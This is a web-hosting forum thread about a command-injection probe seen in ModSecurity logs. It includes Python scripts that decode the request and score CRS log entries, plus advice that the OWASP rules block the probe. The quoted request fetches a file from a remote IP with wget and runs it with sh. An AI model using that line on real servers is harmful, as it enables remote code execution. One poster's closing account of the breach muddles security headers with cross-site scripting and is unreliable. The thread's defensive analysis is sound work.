SOLVED Entry in Mod Security Log question

webstuff

Well-Known Member
Jul 19, 2011
We recently found some scripts that look pretty nasty.. Any body have any idea what this person was trying to do?

GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$

thanks
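The request line quoted above is easier to read once the percent-encoding is undone and the injected text is split on its `;` separators. The script below is an added example, not code from this thread; it assumes the target CGI splices the `cli` value into a single-quoted shell argument (which is what the leading `%27`, a `'`, is there to break out of) and that the trailing `'$` is the quote-closing tail rather than part of the file name. The two request lines it decodes are the ones quoted in this thread, the second with the 1.2.3.4 placeholder the later poster used; the exact quoting the target applies is not shown in the thread, so the extractor only strips that tail.

```python
"""Decode a wget-and-run command-injection probe of the kind quoted above.

Added example, not code from the original thread. Assumes the `cli` value
lands inside a single-quoted shell argument on the target; the request
lines in SAMPLES are the ones quoted in the thread (constructed inputs).
"""
import re
from urllib.parse import unquote

# Constructed inputs: the request lines quoted in this thread.
SAMPLES = [
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$",
    "GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$",
]

DOWNLOADERS = ("wget", "curl", "tftp", "ftpget")          # fetch stage
URL_RE = re.compile(r"https?://[^\s;|&'\"]+")               # where the dropper comes from
REDIRECT_RE = re.compile(r">\s*([^\s;|&'\"]+)")             # `-O -> /tmp/x` writes stdout to a file
EXEC_RE = re.compile(r"^\s*(?:busybox\s+)?(?:sh|bash|ash)\s+(\S+)")  # execute stage


def first_word(s):
    parts = s.split(maxsplit=1)
    return parts[0] if parts else ""


def parse_query(target):
    """Split 'path?k=v&k2=v2' into (path, {k: decoded v}).

    urllib.parse.parse_qs is deliberately avoided: before Python 3.10 it also
    splits on ';', which would destroy the very payload we want to see.
    """
    path, _, query = target.partition("?")
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return path, params


def decode_request(line):
    """Return the injection stages hidden in one request-line string."""
    method, target = line.split()[:2]
    path, params = parse_query(target)
    # The injected shell text is whatever parameter carries a ';' separator.
    param, value = next(((k, v) for k, v in params.items() if ";" in v), (None, ""))
    stages = [s.strip() for s in value.split(";")] if value else []
    download = next((s for s in stages if first_word(s) in DOWNLOADERS), None)
    execute = next((s for s in stages if EXEC_RE.match(s)), None)
    url_m = URL_RE.search(download) if download else None
    drop_m = REDIRECT_RE.search(download) if download else None
    # The trailing '$ is the payload's quote-closing tail, not part of the path;
    # what the target shell really runs depends on quoting the thread does not show.
    executed = EXEC_RE.match(execute).group(1).rstrip("'\"$") if execute else None
    url = url_m.group(0) if url_m else None
    dropped = drop_m.group(1) if drop_m else None
    verdict = "download-and-execute" if url and executed and executed == dropped else "other"
    return {
        "method": method, "path": path, "param": param, "decoded": value,
        "stages": stages, "download_url": url, "dropped_path": dropped,
        "executed_path": executed, "verdict": verdict,
    }


if __name__ == "__main__":
    for line in SAMPLES:
        r = decode_request(line)
        print(f"{r['method']} {r['path']}  {r['param']}={r['decoded']}")
        for i, stage in enumerate(r["stages"], 1):
            print(f"  stage {i}: {stage}")
        print(f"  fetch {r['download_url']} -> {r['dropped_path']}, run {r['executed_path']}: {r['verdict']}")
```

Stage 1 (`aa aa'`) only closes the quote the CGI opened; stage 2 fetches a dropper into /tmp and stage 3 runs it with `sh`. Nothing in the request depends on the web application's own logic, which is why the same line shows up against servers that have no `/login.cgi` at all.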
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
Hello,

The previous post includes an accurate description of what it looks like the attack was attempting to do. Let us know if you have additional questions.

Thank you.
 

webstuff

Well-Known Member
Jul 19, 2011
There was a security issue with a php file and tmp files were being deleted..

I'm not sure if this helps any..

Uptime: 123 seconds
Executable:
/usr/bin/php
Command Line (often faked in exploits):
/usr/bin/php
Network connections by the process (if any):
tcp: 127.0.0.1:33596 -> 127.0.0.1:3306
tcp: 127.0.0.1:33598 -> 127.0.0.1:3306
Files open by the process (if any):

/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/tmp/.ZendSem.gYLBCK (deleted)
/tmp/ZCUDi4colR (deleted)


I have more of the log too. Any other ideas or suggestions on where to look? I see they are trying to connect... They tried to connect 30 times today too.
 

webstuff

Well-Known Member
Jul 19, 2011
> Hello,
>
> Can you expand on this statement? For instance, did you remove the PHP file and confirm the issue persists?
>
> Thank you.

Yes, I did remove the PHP hole, or at least I believe I did. So far I haven't seen any funky stuff, but I have seen this. The only other question I have with this is: do you think there is any chance they could have gotten my MySQL database login? In other words, when you see this sort of log, I assume you wouldn't need the MySQL username and password, correct? Or is there a possibility? Also, I can provide whatever else you would like. I do have some of the original files for some items.

(The entire website was a complete mess. I had contacted my hosting provider and talked to the security team, and they kept telling me I had nothing to worry about, but I just didn't buy that, so this is sort of a learning experience for me too. After I started removing the stuff I stopped getting high server alerts, other alerts, etc.)

But I do see connections like that in my mod security. Just want to be 110% sure I am not missing anything. Also, I did happen to find some advanced malware link, I believe, to where it installs a virus in the firmware, I believe. And if I understand everything correctly, it's one of those where if you wipe the drive and completely format it, it still stays on the system. Plus there were open folders, public keys, etc. I do not believe anything got changed, but then again, from my newbie side of the details I always could be missing something. There is other stuff that isn't going on which gives me reason to believe I got it too. I will gladly PM any details too.

Thank you again so much for the help.

Thank you again.
 

cPanelMichael

Administrator
Staff member
Apr 11, 2011
Hello @webstuff,

It's difficult to know for sure the extent to which the attacker was able to gain access to your website's files and passwords (assuming they were stored in a PHP configuration file). For additional investigation, it's generally a good idea to consult with a qualified system administrator. We provide a list of companies offering system administration services at:

System Administration Services | cPanel Forums

Additionally, we provide some more information about our Technical Support Department's ability to troubleshoot issues stemming from a hacked server at:

Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation

Thank you.
 

webstuff

Well-Known Member
Jul 19, 2011
Yes, I removed the files. In mod security it's showing they were trying to connect to 127.0.0.1. Can anyone point me in the right direction on this? It's showing blocked each time. Or any thoughts at all?
 

webstuff

Well-Known Member
Jul 19, 2011
OK, just saw that; I looked into that. Haha, actually some top people were hired and they said they saw nothing and it was nothing to worry about. They thought it was email or some other files, which clearly wasn't correct. I am glad I kept investigating. I will keep you posted.
 

webstuff

Well-Known Member
Jul 19, 2011
Just so everyone knows, after digging around I found out that there was a PHP script that was compromised. Turns out that one version of PHP, when you get it to crash correctly with MySQL, would then show the login for MySQL, so the hacker used cross-site scripting (X-Frame-Options, X-Content, HTTP Strict Transport, etc.). So they would make their script http://localhost/whatever on their machine, then cross into the website with an action of POST, GET, etc. Then they would select or inject MySQL and grab sessions or hijack them that way. Anyways, after doing so much searching myself, lots of lost hours, me annoying web hosting companies, and really no help, this is what I came across.

It was sort of upsetting because I contacted the web hosting companies, security companies, etc., and noooooo help... They just kept telling me it's normal for that to run, and I would always say this sort of load shouldn't be going on. Anyways, after hours and hours (easily 100-something) of reading and time spent with firms, I finally found out it was this. Not to mention the website has easily over a million files, which only makes it more difficult. But I hope this information will help others.

Mark it closed. As for everyone else, thanks for helping and pointing me in the right direction; you know who you are.
 

TheGrumpyOne

Registered
Mar 9, 2017
United States
cPanel Access Level
Root Administrator
Hello,
I am finding this string in my log file.

"GET /login.cgi?cli=aa%20aa%27;wget%20http://1.2.3.4/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$

I've been getting these for the last 3 weeks. Has anyone come up with a way to block this?
I have OWASP, but I'm a noob when it comes to writing rules and don't want to screw things up.
Thanks in advance for the help!
 

fuzzylogic

Well-Known Member
Nov 8, 2014
149
89
78
cPanel Access Level
Root Administrator
You should not need to write rules for requests like these.
I would expect the OWASP CRS to block requests like this if it is set up properly and working.

In my test using the cPanel-provided rules:
OWASP ModSecurity Core Rule Set V3.0
SpiderLabs OWASP curated ModSecurity rule set

This request triggered the remote command injection rule IDs 932105 and 932115, scoring 5 anomaly points each.

The 10 anomaly points triggered blocking rule ID 949110:
Message: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score.

The 10 anomaly points triggered logging rule ID 980130:
Message: Warning. Operator GE matched 5 at TX:inbound_anomaly_score.
[msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection"]
 
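The scoring fuzzylogic describes (two CRITICAL matches at 5 points each, rule 949110 comparing the total with the threshold, rule 980130 writing the summary) can be checked against a server's own Apache error_log rather than taken on faith. The script below is an added example, not code from this thread or from the CRS project. It uses the CRS 3.0 default severity points (CRITICAL 5, ERROR 4, WARNING 3, NOTICE 2) and default inbound threshold of 5, parses constructed error_log entries modeled on the messages quoted above (documentation IPs, shortened unique_ids, abbreviated pattern text), rebuilds each transaction's inbound score, counts how many times each client tripped the rules (the "they tried 30 times today" question from earlier in the thread), and flags any transaction that reached the threshold without a 949110 "Access denied" line, which is the usual sign that the engine is running in DetectionOnly mode and only logging.

```python
"""Triage ModSecurity / OWASP CRS 3.0 error_log entries by transaction.

Added example, not code from this thread or from the CRS project. The
severity points and the threshold are the CRS 3.0 defaults; SAMPLE_LOG is
constructed to mirror the messages quoted in the thread (documentation IPs,
shortened unique_ids, abbreviated pattern text).
"""
import re
from collections import defaultdict

SEVERITY_POINTS = {"CRITICAL": 5, "ERROR": 4, "WARNING": 3, "NOTICE": 2}
INBOUND_THRESHOLD = 5      # CRS 3.0 default tx.inbound_anomaly_score_threshold
BLOCKING_RULE = "949110"   # compares the running score with the threshold
REPORT_RULE = "980130"     # writes the summary line; adds no points

# Constructed sample: two probes from one client (scoring 10 and 5),
# then an unrelated low-severity hit from another client.
SAMPLE_LOG = [
    '[Thu Mar 09 10:15:02.101 2017] [:error] [pid 4021] [client 198.51.100.23:41230] ModSecurity: Warning. Pattern match "[;|&]" at ARGS:cli. [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [severity "CRITICAL"] [uri "/login.cgi"] [unique_id "WMH1"]',
    '[Thu Mar 09 10:15:02.102 2017] [:error] [pid 4021] [client 198.51.100.23:41230] ModSecurity: Warning. Pattern match "[;|&]" at ARGS:cli. [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [severity "CRITICAL"] [uri "/login.cgi"] [unique_id "WMH1"]',
    '[Thu Mar 09 10:15:02.103 2017] [:error] [pid 4021] [client 198.51.100.23:41230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [uri "/login.cgi"] [unique_id "WMH1"]',
    '[Thu Mar 09 10:15:02.104 2017] [:error] [pid 4021] [client 198.51.100.23:41230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Windows Command Injection"] [uri "/login.cgi"] [unique_id "WMH1"]',
    '[Thu Mar 09 11:02:44.511 2017] [:error] [pid 4025] [client 198.51.100.23:50112] ModSecurity: Warning. Pattern match "[;|&]" at ARGS:cli. [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [severity "CRITICAL"] [uri "/login.cgi"] [unique_id "WMH2"]',
    '[Thu Mar 09 11:02:44.512 2017] [:error] [pid 4025] [client 198.51.100.23:50112] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [uri "/login.cgi"] [unique_id "WMH2"]',
    '[Thu Mar 09 11:30:00.007 2017] [:error] [pid 4030] [client 203.0.113.9:33010] ModSecurity: Warning. Pattern match "[0-9.]+" at REQUEST_HEADERS:Host. [id "920350"] [msg "Host header is a numeric IP address"] [severity "WARNING"] [uri "/"] [unique_id "WMH3"]',
]

FIELD_RE = re.compile(r'\[(\w+) "((?:[^"\\]|\\.)*)"\]')   # [id "932105"], [msg "..."], ...
CLIENT_RE = re.compile(r"\[client ([^\]:]+)")              # [client IP:port] -> IP


def parse_entry(line):
    """Pull the bracketed key/value fields, the client IP and the action out of one line."""
    fields = dict(FIELD_RE.findall(line))
    m = CLIENT_RE.search(line)
    fields["client"] = m.group(1) if m else None
    fields["action"] = "deny" if "Access denied" in line else "warn"
    return fields


def summarize(lines, threshold=INBOUND_THRESHOLD):
    """Group entries by unique_id and rebuild each transaction's inbound score."""
    tx = defaultdict(lambda: {"client": None, "uri": None, "rules": [], "score": 0, "blocked": False})
    for line in lines:
        e = parse_entry(line)
        t = tx[e.get("unique_id")]
        t["client"] = t["client"] or e["client"]
        t["uri"] = t["uri"] or e.get("uri")
        rid = e.get("id")
        if rid == BLOCKING_RULE:
            t["blocked"] = e["action"] == "deny"
        elif rid and rid != REPORT_RULE:
            t["rules"].append(rid)
            t["score"] += SEVERITY_POINTS.get(e.get("severity", ""), 0)
    for t in tx.values():
        t["over_threshold"] = t["score"] >= threshold
        # Score reached the threshold but no deny was logged: engine probably in DetectionOnly.
        t["detect_only_suspect"] = t["over_threshold"] and not t["blocked"]
    return dict(tx)


def attempts_per_client(summary):
    """How many scored transactions each client produced (the '30 times today' count)."""
    counts = defaultdict(int)
    for t in summary.values():
        counts[t["client"]] += 1
    return dict(counts)


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    for uid, t in summary.items():
        state = "blocked" if t["blocked"] else ("NOT blocked" if t["over_threshold"] else "below threshold")
        print(f"{uid}: {t['client']} {t['uri']} rules={t['rules']} score={t['score']} {state}")
    print("attempts per client:", attempts_per_client(summary))
```

Against a live cPanel box the same functions can be pointed at `/usr/local/apache/logs/error_log` (the path already visible in the lfd output earlier in the thread); grouping on `unique_id` is what lets the two 5-point hits be added up per request instead of per line.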